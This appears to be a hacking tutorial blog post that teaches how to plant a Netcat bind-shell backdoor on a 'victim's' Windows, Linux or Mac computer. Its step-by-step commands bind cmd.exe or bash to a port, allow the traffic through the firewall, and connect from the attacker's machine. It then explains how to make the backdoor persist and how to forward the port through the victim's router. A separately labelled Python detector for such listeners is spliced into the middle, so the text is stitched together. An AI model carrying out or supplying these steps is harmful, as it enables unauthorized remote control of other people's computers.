Want to be an elite hacker, but don't know where to begin? MyPrivateVoid() takes you back to basics with our Old School Hacking series of tutorials.
For our first tutorial, we will show you how to install a simple backdoor on nearly any system using Netcat's dead-simple shell binding functionality.
Background:
What is a backdoor?
A backdoor is "a method of bypassing normal authentication, securing remote access to a computer"
What tools will we be using?
Netcat - a computer networking service for reading from and writing to network connections using TCP or UDP. Netcat is the "Swiss Army Knife of TCP/IP" (Wikipedia Description)
Netcat is preinstalled on almost all Unix/BSD variants (Mac OSX and Linux) and is available for Windows.
Prerequisites:
You must have command line access to the computer on which you wish to install the backdoor.
If you wish to be able to access the backdoor from someplace other than the local network (across the internet) then you need access to the victim's router configurations.
And now, without further ado, LET'S HACK THE GIBSON!
The Procedure:
If the intended victim's computer is running Windows, start at Step 1; otherwise, skip to Step 2.
Step 1) Download Netcat for Windows and extract it to a location on the victim's computer that is in the system path. (I use C:\Windows\)
Step 2) On the victim computer, from the command line, type:
nc -L -p PORT -d -e PATH_TO_SHELL
PORT can be any port number that is not already assigned to another service; try something in the 10000-99999 range.
PATH_TO_SHELL is the location of the shell executable that will be bound to the port.
In Windows, this would simply be: cmd.exe
In Linux or Mac, this might be something like: /bin/bash (can be found by typing: which bash)
Usage Example:
nc -L -p 49127 -d -e cmd.exe
This command causes Netcat to run in the background, as its own process, so you can close the terminal window and it will continue to run!
Netcat is now listening for any incoming connection on port 49127 and binding it to the specified executable, which in this case is the Windows "shell".
Windows computers will often throw up a window asking if you would like to allow the Windows Firewall to let traffic from nc.exe through... Make sure to permanently allow traffic on all networks, public and private.
Step 3) On your computer (which should have Netcat installed and be on the same network as the victim) type into your terminal:
nc -v -n IP_ADDRESS PORT
IP_ADDRESS is the local IP address of the victim's computer... duh!
PORT is the port you specified in Step 2
Usage Example:
nc -v -n 192.168.1.100 49127
Voila! If you did everything correctly, you should now have remote shell access to the victim's computer!!!
(You will have the same access permissions as whatever user happens to be logged on at the time)
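Seen from the defending side, the Step 2 command is exactly what lands in process-creation logs, and the combination of listen mode with -e is the part worth alerting on. The following is an added example, not part of the original tutorial: a Python check run over constructed sample command lines (the function names, host names and sample records are assumptions made for illustration).

```python
import ntpath
import shlex

# Assumption: matching on executable name; a renamed binary needs other signals.
NETCAT_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "netcat.exe"}

def inspect_cmdline(cmdline):
    """Return a finding for a netcat listener that execs a program, else None."""
    try:
        argv = shlex.split(cmdline, posix=False)  # keep Windows backslashes
    except ValueError:                            # unbalanced quotes
        argv = cmdline.split()
    if not argv or ntpath.basename(argv[0].strip('"')).lower() not in NETCAT_NAMES:
        return None
    listen, values, i = False, {}, 1
    while i < len(argv):
        arg = argv[i]
        flags = arg[1:] if arg[:1] == "-" and arg[:2] != "--" else ""
        for pos, flag in enumerate(flags):
            if flag in "lL":                      # listen mode (-L as used in Step 2)
                listen = True
            elif flag in "pe":                    # -p PORT and -e PROGRAM take a value
                if flags[pos + 1:]:               # attached form, e.g. -p49127
                    values[flag] = flags[pos + 1:]
                elif i + 1 < len(argv):           # separate form, e.g. -p 49127
                    i += 1
                    values[flag] = argv[i]
                break
        i += 1
    if listen and "e" in values:
        return {"port": values.get("p"), "program": values["e"].strip('"')}
    return None

# Constructed process-creation records (host, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("WS-01", r"C:\Windows\nc.exe -L -p 49127 -d -e cmd.exe"),
    ("WS-02", "nc -v -n 192.168.1.100 49127"),
    ("SRV-03", "/usr/bin/nc -lp 49127 -e /bin/bash"),
    ("WS-04", r"C:\Windows\System32\notepad.exe notes.txt"),
]

def scan(events):
    """Return (host, finding) pairs for every flagged command line."""
    return [(host, f) for host, cmd in events if (f := inspect_cmdline(cmd))]

if __name__ == "__main__":
    for host, f in scan(SAMPLE_EVENTS):
        print(f"ALERT {host}: netcat listener, port {f['port']}, runs {f['program']}")
```

The Step 3 client command (WS-02) is not flagged, because it neither listens nor executes a program; only the listener bound to a shell is.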
Extending this Tutorial
Make this backdoor persist across a system shutdown or reboot: Append the command you ran in Step 2 to the autorun script of the particular OS you are working with. (Google is your friend!)
Make the remote shell accessible from any computer (not just those on the LAN): Access the victim's router and add a port forwarding rule which forwards the port you selected in Step 2 to the IP Address of the victim's computer. Once this is done, you will be able to access the remote shell from anywhere by just replacing their LAN IP Address with their external IP Address in the Netcat command.
*Interesting Side Note: Android has Netcat built into it... Mobile Hacking FTW!
Have fun!